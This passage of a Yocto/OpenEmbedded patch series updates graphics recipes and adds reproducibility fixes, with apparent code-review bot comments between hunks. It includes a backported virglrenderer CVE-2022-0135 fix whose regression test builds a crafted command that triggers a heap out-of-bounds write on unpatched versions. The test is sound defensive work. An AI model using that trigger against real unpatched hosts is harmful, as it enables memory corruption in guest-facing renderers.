--- a/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
+++ b/meta/recipes-graphics/libsdl2/libsdl2_2.0.12.bb
@@ -20,6 +20,9 @@ SRC_URI = "http://www.libsdl.org/release/SDL2-${PV}.tar.gz \
file://more-gen-depends.patch \
file://directfb-spurious-curly-brace-missing-e.patch \
file://directfb-renderfillrect-fix.patch \
+ file://CVE-2020-14409-14410.patch \
+ file://CVE-2021-33657.patch \
+ file://CVE-2022-4743.patch \
"
S = "${WORKDIR}/SDL2-${PV}"
@@ -57,7 +60,7 @@ PACKAGECONFIG ??= " \
"
PACKAGECONFIG[alsa] = "--enable-alsa --disable-alsatest,--disable-alsa,alsa-lib,"
PACKAGECONFIG[arm-neon] = "--enable-arm-neon,--disable-arm-neon"
-PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb"
+PACKAGECONFIG[directfb] = "--enable-video-directfb,--disable-video-directfb,directfb,directfb"
PACKAGECONFIG[gles2] = "--enable-video-opengles,--disable-video-opengles,virtual/libgles2"
PACKAGECONFIG[jack] = "--enable-jack,--disable-jack,jack"
PACKAGECONFIG[kmsdrm] = "--enable-video-kmsdrm,--disable-video-kmsdrm,libdrm virtual/libgbm"
diff --git a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
index 03b38027a1..f14ed0f52b 100644
--- a/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
+++ b/meta/recipes-graphics/libva/libva-utils_2.6.0.bb
@@ -14,7 +14,7 @@ SECTION = "x11"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://COPYING;md5=b148fc8adf19dc9aec17cf9cd29a9a5e"
-SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch"
+SRC_URI = "git://github.com/intel/libva-utils.git;branch=v2.6-branch;protocol=https"
SRCREV = "8ea1eba433dcbceb0e5dcb54b8e3f984987f7a17"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
index a08eb252ce..3ea67d09d6 100644
--- a/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
+++ b/meta/recipes-graphics/matchbox-wm/matchbox-wm_1.2.2.bb
@@ -12,7 +12,7 @@ DEPENDS = "libmatchbox virtual/libx11 libxext libxrender startup-notification ex
# SRCREV tagged 1.2.2
SRCREV = "27da947e7fbdf9659f7e5bd1e92af92af6c03970"
-SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager \
+SRC_URI = "git://git.yoctoproject.org/matchbox-window-manager;branch=master \
file://0001-Fix-build-with-gcc-10.patch \
file://kbdconfig"
diff --git a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
index cd35a1f850..a64f2faa85 100644
--- a/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
+++ b/meta/recipes-graphics/mesa/files/0002-meson.build-make-TLS-ELF-optional.patch
@@ -6,6 +6,21 @@ Subject: [PATCH] meson.build: make TLS ELF optional
USE_ELF_TLS has replaced GLX_USE_TLS so this patch is the original "make
TLS GLX optional again" patch updated to the latest mesa.
+For details, see:
+https://gitlab.freedesktop.org/mesa/mesa/-/issues/966
+
+This prevents runtime segfault on musl:
+
+Traceback (most recent call last):
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/core/decorator/__init__.py", line 36, in wrapped_f
+ return func(*args, **kwargs)
+ File "/home/pokybuild/yocto-worker/musl-qemux86/build/meta/lib/oeqa/runtime/cases/parselogs.py", line 378, in test_parselogs
+ self.assertEqual(errcount, 0, msg=self.msg)
+AssertionError: 1 != 0 : Log: /home/pokybuild/yocto-worker/musl-qemux86/build/build/tmp/work/qemux86-poky-linux-musl/core-image-sato-sdk/1.0-r0/target_logs/Xorg.0.log
+-----------------------
+Central error: [ 10.477] (EE) Failed to load /usr/lib/xorg/modules/extensions/libglx.so: Error relocating /usr/lib/libGL.so.1: alphasort: initial-exec TLS resolves to dynamic definition in /usr/lib/libGL.so.1
+***********************
+
Upstream-Status: Inappropriate [configuration]
Signed-off-by: Alistair Francis <alistair@alistair23.me>
diff --git a/meta/recipes-graphics/mesa/mesa.inc b/meta/recipes-graphics/mesa/mesa.inc
index b7ef496fdc..bfab19e773 100644
--- a/meta/recipes-graphics/mesa/mesa.inc
+++ b/meta/recipes-graphics/mesa/mesa.inc
@@ -26,11 +26,6 @@ PROVIDES = " \
inherit meson pkgconfig python3native gettext features_check
-# Unset these to stop python trying to report the target Python setup
-_PYTHON_SYSCONFIGDATA_NAME[unexport] = "1"
-STAGING_INCDIR[unexport] = "1"
-STAGING_LIBDIR[unexport] = "1"
-
BBCLASSEXTEND = "native nativesdk"
ANY_OF_DISTRO_FEATURES_class-target = "opengl vulkan"
@@ -236,7 +231,7 @@ python mesa_populate_packages() {
import re
dri_drivers_root = oe.path.join(d.getVar('PKGD'), d.getVar('libdir'), "dri")
if os.path.isdir(dri_drivers_root):
- dri_pkgs = os.listdir(dri_drivers_root)
+ dri_pkgs = sorted(os.listdir(dri_drivers_root))
lib_name = d.expand("${MLPREFIX}mesa-megadriver")
for p in dri_pkgs:
m = re.match(r'^(.*)_dri\.so$', p)
diff --git a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
index 4e89d631c3..549b0cbdf7 100644
--- a/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
+++ b/meta/recipes-graphics/mini-x-session/mini-x-session_0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Very simple session manager for X"
+DESCRIPTION = "Simple session manager for X, that provides just the right boilerplate to create a session and launch the browser "
HOMEPAGE = "http://www.yoctoproject.org"
BUGTRACKER = "http://bugzilla.pokylinux.org"
diff --git a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
index 58a6997ffe..88101b5dcc 100644
--- a/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
+++ b/meta/recipes-graphics/mx/mx-1.0_1.4.7.bb
@@ -7,7 +7,7 @@ PV = "1.4.7+git${SRCPV}"
# Exclude x.99.x versions from upstream checks
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>^\d+(\.(?!99)\d+)+)"
-SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4 \
+SRC_URI = "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https \
file://fix-test-includes.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/mx/mx.inc b/meta/recipes-graphics/mx/mx.inc
index 714a06f0af..c977849c96 100644
--- a/meta/recipes-graphics/mx/mx.inc
+++ b/meta/recipes-graphics/mx/mx.inc
@@ -1,4 +1,10 @@
SUMMARY = "Clutter based UI widget library"
+DESCRIPTION = "Mx is a widget toolkit using Clutter that provides a set of standard interface \
+elements, including buttons, progress bars, scroll bars and others. It also \
+implements some standard managers. One other interesting feature is the \
+possibility setting style properties from a CSS format file."
+HOMEPAGE = "https://github.com/clutter-project/mx"
+BUGTRACKER = "https://github.com/clutter-project/mx/issues"
LICENSE = "LGPLv2.1"
inherit clutter autotools features_check gobject-introspection gtk-doc
diff --git a/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
new file mode 100644
index 0000000000..caa48e088d
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-Add-a-missing-include-for-htobe32-definition.patch
@@ -0,0 +1,27 @@
+From d623e9797b7ee9b3739a8a4afe1a01f7e03754aa Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Sun, 1 Nov 2020 20:08:49 +0000
+Subject: [PATCH] Add a missing include for htobe32 definition
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+index 5f45e0c23..c755ee29a 100644
+--- a/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
++++ b/tests/spec/nv_copy_depth_to_color/nv_copy_depth_to_color.c
+@@ -34,6 +34,8 @@
+
+ #include "piglit-util-gl.h"
+
++#include <endian.h>
++
+ #define IMAGE_WIDTH 60
+ #define IMAGE_HEIGHT 60
+
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
new file mode 100644
index 0000000000..cc9482c047
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-framework-profile.py-make-test-lists-reproducible.patch
@@ -0,0 +1,31 @@
+From 9086d42df1f3134bafcfe33ff16db7bbb9d9a0fd Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 30 Nov 2020 23:08:22 +0000
+Subject: [PATCH] framework/profile.py: make test lists reproducible
+
+These are created with os.walk, which yields different
+order depending on where it's run.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ framework/profile.py | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/framework/profile.py b/framework/profile.py
+index c210e535e..9b5d51d68 100644
+--- a/framework/profile.py
++++ b/framework/profile.py
+@@ -528,7 +528,11 @@ class TestProfile(object):
+ else:
+ opts[n] = self.test_list[n]
+ else:
+- opts = self.test_list # pylint: disable=redefined-variable-type
++ opts = collections.OrderedDict()
++ test_keys = list(self.test_list.keys())
++ test_keys.sort()
++ for k in test_keys:
++ opts[k] = self.test_list[k]
+
+ for k, v in self.filters.run(opts.items()):
+ yield k, v
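Review bot: The key list, in-place sort and copy loop in the new `else` branch can be a single expression, which makes the intent (iterate in sorted key order) easier to see: `opts = collections.OrderedDict((k, self.test_list[k]) for k in sorted(self.test_list))`. The hunk does not show whether profile.py already imports `collections`; confirm this, since a missing import would only fail when this branch runs. The enclosing method starts outside the hunk.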
diff --git a/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
new file mode 100644
index 0000000000..8704f98500
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch
@@ -0,0 +1,44 @@
+From 1b23539aece156f6fe0789cb988f22e5915228f6 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:12:32 +0000
+Subject: [PATCH 1/2] generated_tests/gen_tcs/tes_input_tests.py: do not
+ hardcode the full binary path
+
+This helps reproducibility.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ generated_tests/gen_tcs_input_tests.py | 2 +-
+ generated_tests/gen_tes_input_tests.py | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/generated_tests/gen_tcs_input_tests.py b/generated_tests/gen_tcs_input_tests.py
+index face4f19a..e36671af4 100644
+--- a/generated_tests/gen_tcs_input_tests.py
++++ b/generated_tests/gen_tcs_input_tests.py
+@@ -272,7 +272,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tcs_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+diff --git a/generated_tests/gen_tes_input_tests.py b/generated_tests/gen_tes_input_tests.py
+index 3d847b5cc..954840b20 100644
+--- a/generated_tests/gen_tes_input_tests.py
++++ b/generated_tests/gen_tes_input_tests.py
+@@ -301,7 +301,7 @@ class Test(object):
+ relative probe rgb (0.75, 0.75) (0.0, 1.0, 0.0)
+ """)
+
+- test = test.format(self=self, generator_command=" ".join(sys.argv))
++ test = test.format(self=self, generator_command="generated_tests/gen_tes_input_tests.py")
+
+ filename = self.filename()
+ dirname = os.path.dirname(filename)
+--
+2.17.1
+
diff --git a/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
new file mode 100644
index 0000000000..2efba6f866
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-serializer.py-make-.gz-files-reproducible.patch
@@ -0,0 +1,30 @@
+From 1919bb7f4072d73dcbb64d0e06eff5b04529c3db Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Mon, 16 Nov 2020 18:01:02 +0000
+Subject: [PATCH] serializer.py: make .gz files reproducible
+
+.gz format contains mtime of the compressed data, and
+SOURCE_DATE_EPOCH is the standard way to make it reproducuble.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/serializer.py | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/tests/serializer.py b/tests/serializer.py
+index bd14bc3db..bc5b45d7f 100644
+--- a/tests/serializer.py
++++ b/tests/serializer.py
+@@ -138,7 +138,10 @@ def serializer(name, profile, outfile):
+ et.SubElement(env, 'env', name=k, value=v)
+
+ tree = et.ElementTree(root)
+- with gzip.open(outfile, 'wb') as f:
++ reproducible_mtime = None
++ if 'SOURCE_DATE_EPOCH' in os.environ:
++ reproducible_mtime=os.environ['SOURCE_DATE_EPOCH']
++ with gzip.GzipFile(outfile, 'wb', mtime=reproducible_mtime) as f:
+ tree.write(f, encoding='utf-8', xml_declaration=True)
+
+
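Review bot: `reproducible_mtime` is taken straight from the environment as a string and passed to `gzip.GzipFile(mtime=...)`, so the header timestamp depends on the gzip module coercing it, and a malformed SOURCE_DATE_EPOCH only fails deep inside the write. Convert at the boundary instead: `reproducible_mtime = int(os.environ['SOURCE_DATE_EPOCH'])`, which also fixes the missing spaces around `=`. Whether serializer.py already imports `os` is not visible in this hunk and should be confirmed.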
diff --git a/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
new file mode 100644
index 0000000000..8321be8490
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0001-tests-shader.py-sort-the-file-list-before-working-on.patch
@@ -0,0 +1,28 @@
+From 5bf89c6a314952313b2b762fff0d5501fe57ac53 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+ assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+
+- # We'll end up with a list of tuples, split that into two lists
++ # This makes the xml output reproducible, as os.walk() order is random
++ files.sort()
++ # We'll end up with a list of tuples, split that into two list
+ files, installedfiles = list(zip(*files))
+ files = list(files)
+ installedfiles = list(installedfiles)
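Review bot: The rewritten comment introduces a typo ("split that into two list") into a line that did not need to change; keep the original `# We'll end up with a list of tuples, split that into two lists` and add only the new comment and `files.sort()` above it. The new comment is also imprecise, because os.walk() order follows the filesystem's directory order rather than being random. A more accurate wording is `# Sort so the xml output is reproducible; os.walk() order depends on the filesystem`.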
diff --git a/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibilty.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+
+ source_dir = getenv("PIGLIT_SOURCE_DIR");
+ if (source_dir == NULL) {
+- source_dir = SOURCE_DIR;
++ source_dir = ".";
+ }
+
+ snprintf(filename_with_path, FILENAME_MAX - 1,
+--
+2.17.1
+
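Review bot: With PIGLIT_SOURCE_DIR unset, shader files are now resolved relative to the current working directory of the process, so which file gets loaded depends on where the test binary is launched from, and the failure appears only later as a missing shader. Neither the patch description nor the code says that the variable is now effectively required at run time. I would document that at the fallback, e.g. `/* No build-time default: set PIGLIT_SOURCE_DIR, otherwise paths are relative to the cwd */`. The body of piglit_compile_shader continues outside the hunk.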
diff --git a/meta/recipes-graphics/piglit/piglit_git.bb b/meta/recipes-graphics/piglit/piglit_git.bb
index 58d10d6b9b..9897ef1575 100644
--- a/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/meta/recipes-graphics/piglit/piglit_git.bb
@@ -1,16 +1,24 @@
SUMMARY = "OpenGL driver testing framework"
DESCRIPTION = "Piglit is an open-source test suite for OpenGL and OpenCL \
implementations."
+HOMEPAGE = "https://gitlab.freedesktop.org/mesa/piglit"
+BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues"
LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause"
LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0"
-SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \
+SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \
file://0001-cmake-install-bash-completions-in-the-right-place.patch \
file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \
+ file://0001-Add-a-missing-include-for-htobe32-definition.patch \
+ file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \
+ file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \
+ file://0001-serializer.py-make-.gz-files-reproducible.patch \
+ file://0001-framework-profile.py-make-test-lists-reproducible.patch \
+ file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \
"
UPSTREAM_CHECK_COMMITS = "1"
-SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813"
+SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985"
# (when PV goes above 1.0 remove the trailing r)
PV = "1.0+gitr${SRCPV}"
@@ -35,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/"
PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}"
PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut,"
PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}"
+PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader"
+export PIGLIT_BUILD_DIR = "../../../../git"
do_configure_prepend() {
if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then
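Review bot: `export PIGLIT_BUILD_DIR = "../../../../git"` is added with no comment explaining which directory the path is relative to or which build step reads it. The four `..` levels encode an assumption about the work directory layout that would break silently if that layout changes. Add a comment above the export along the lines of `# Read by <consumer>; relative to <directory> so that no absolute build path is embedded`, with the placeholders filled in by the author.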
diff --git a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
index d10bddb529..f69e4838f4 100644
--- a/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
+++ b/meta/recipes-graphics/startup-notification/startup-notification_0.12.bb
@@ -1,6 +1,9 @@
SUMMARY = "Enables monitoring and display of application startup"
+DESCRIPTION = "Contains a reference implementation of the startup notification protocol. \
+The reference implementation is mostly under an X Window System style license, and has \
+no special dependencies. "
HOMEPAGE = "http://www.freedesktop.org/wiki/Software/startup-notification/"
-BUGTRACKER = "https://bugs.freedesktop.org/enter_bug.cgi?product=Specifications"
+BUGTRACKER = "https://gitlab.freedesktop.org/xdg/startup-notification/-/issues"
# most files are under MIT, but libsn/sn-util.c is under LGPL, the
# effective license is LGPL
diff --git a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
index 3e1ba196b5..b75bd4c51d 100644
--- a/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
+++ b/meta/recipes-graphics/ttf-fonts/ttf-bitstream-vera_1.10.bb
@@ -1,4 +1,5 @@
SUMMARY = "The Bitstream Vera fonts - TTF Edition"
+HOMEPAGE = "https://www.gnome.org/fonts/"
DESCRIPTION = "The Bitstream Vera fonts include four monospace and sans \
faces (normal, oblique, bold, bold oblique) and two serif faces (normal \
and bold). In addition Fontconfig/Xft2 can artificially oblique the \
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
new file mode 100644
index 0000000000..4a277bd4d0
--- /dev/null
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer/CVE-2022-0135.patch
@@ -0,0 +1,100 @@
+From 95e581fd181b213c2ed7cdc63f2abc03eaaa77ec Mon Sep 17 00:00:00 2001
+From: Gert Wollny <gert.wollny@collabora.com>
+Date: Tue, 30 Nov 2021 10:17:26 +0100
+Subject: [PATCH] vrend: Add test to resource OOB write and fix it
+
+v2: Also check that no depth != 1 has been send when none is due
+
+Closes: #250
+Signed-off-by: Gert Wollny <gert.wollny@collabora.com>
+Reviewed-by: Chia-I Wu <olvaffe@gmail.com>
+
+https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/95e581fd181b213c2ed7cdc63f2abc03eaaa77ec
+Upstream-Status: Backport
+CVE: CVE-2022-0135
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/vrend_renderer.c | 3 +++
+ tests/test_fuzzer_formats.c | 43 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 46 insertions(+)
+
+diff --git a/src/vrend_renderer.c b/src/vrend_renderer.c
+index 28f669727..357b81b20 100644
+--- a/src/vrend_renderer.c
++++ b/src/vrend_renderer.c
+@@ -7833,8 +7833,11 @@ static int vrend_renderer_transfer_write_iov(struct vrend_context *ctx,
+ info->box->height) * elsize;
+ if (res->target == GL_TEXTURE_3D ||
+ res->target == GL_TEXTURE_2D_ARRAY ||
++ res->target == GL_TEXTURE_2D_MULTISAMPLE_ARRAY ||
+ res->target == GL_TEXTURE_CUBE_MAP_ARRAY)
+ send_size *= info->box->depth;
++ else if (need_temp && info->box->depth != 1)
++ return EINVAL;
+
+ if (need_temp) {
+ data = malloc(send_size);
+diff --git a/tests/test_fuzzer_formats.c b/tests/test_fuzzer_formats.c
+index 59d6fb671..2de9a9a3f 100644
+--- a/tests/test_fuzzer_formats.c
++++ b/tests/test_fuzzer_formats.c
+@@ -957,6 +957,48 @@ static void test_vrend_set_signle_abo_heap_overflow() {
+ virgl_renderer_submit_cmd((void *) cmd, ctx_id, 0xde);
+ }
+
++/* Test adapted from yaojun8558363@gmail.com:
++ * https://gitlab.freedesktop.org/virgl/virglrenderer/-/issues/250
++*/
++static void test_vrend_3d_resource_overflow() {
++
++ struct virgl_renderer_resource_create_args resource;
++ resource.handle = 0x4c474572;
++ resource.target = PIPE_TEXTURE_2D_ARRAY;
++ resource.format = VIRGL_FORMAT_Z24X8_UNORM;
++ resource.nr_samples = 2;
++ resource.last_level = 0;
++ resource.array_size = 3;
++ resource.bind = VIRGL_BIND_SAMPLER_VIEW;
++ resource.depth = 1;
++ resource.width = 8;
++ resource.height = 4;
++ resource.flags = 0;
++
++ virgl_renderer_resource_create(&resource, NULL, 0);
++ virgl_renderer_ctx_attach_resource(ctx_id, resource.handle);
++
++ uint32_t size = 0x400;
++ uint32_t cmd[size];
++ int i = 0;
++ cmd[i++] = (size - 1) << 16 | 0 << 8 | VIRGL_CCMD_RESOURCE_INLINE_WRITE;
++ cmd[i++] = resource.handle;
++ cmd[i++] = 0; // level
++ cmd[i++] = 0; // usage
++ cmd[i++] = 0; // stride
++ cmd[i++] = 0; // layer_stride
++ cmd[i++] = 0; // x
++ cmd[i++] = 0; // y
++ cmd[i++] = 0; // z
++ cmd[i++] = 8; // w
++ cmd[i++] = 4; // h
++ cmd[i++] = 3; // d
++ memset(&cmd[i], 0, size - i);
++
++ virgl_renderer_submit_cmd((void *) cmd, ctx_id, size);
++}
++
++
+ int main()
+ {
+ initialize_environment();
+@@ -979,6 +1021,7 @@ int main()
+ test_cs_nullpointer_deference();
+ test_vrend_set_signle_abo_heap_overflow();
+
++ test_vrend_3d_resource_overflow();
+
+ virgl_renderer_context_destroy(ctx_id);
+ virgl_renderer_cleanup(&cookie);
+--
+GitLab
+
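Review bot: In the added test_vrend_3d_resource_overflow, `memset(&cmd[i], 0, size - i);` passes a count of array elements where memset expects bytes, so only about a quarter of the remaining `uint32_t cmd[size]` words are zeroed. The rest of the variable-length array is submitted to virgl_renderer_submit_cmd uninitialised, which makes the regression test's input non-deterministic. The call should be `memset(&cmd[i], 0, (size - i) * sizeof(cmd[0]));`. This is inherited from the upstream commit, so it is best reported there rather than changed only in the backport.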
diff --git a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
index 1046b8504f..8185d6f7e8 100644
--- a/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
+++ b/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb
@@ -10,9 +10,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10"
DEPENDS = "libdrm mesa libepoxy"
SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985"
-SRC_URI = "git://anongit.freedesktop.org/virglrenderer \
+SRC_URI = "git://anongit.freedesktop.org/git/virglrenderer;branch=master \
file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \
file://0001-meson.build-use-python3-directly-for-python.patch \
+ file://CVE-2022-0135.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
index 5a8c62e64d..0774f37e31 100644
--- a/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
+++ b/meta/recipes-graphics/vulkan/assimp_5.0.1.bb
@@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271"
DEPENDS = "zlib"
-SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \
+SRC_URI = "git://github.com/assimp/assimp.git;nobranch=1;protocol=https \
file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \
file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \
"
diff --git a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
index c94e768b52..b212814759 100644
--- a/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
+++ b/meta/recipes-graphics/vulkan/vulkan-demos_git.bb
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \
SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf"
SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd"
-SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \
- git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \
- git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \
+SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \
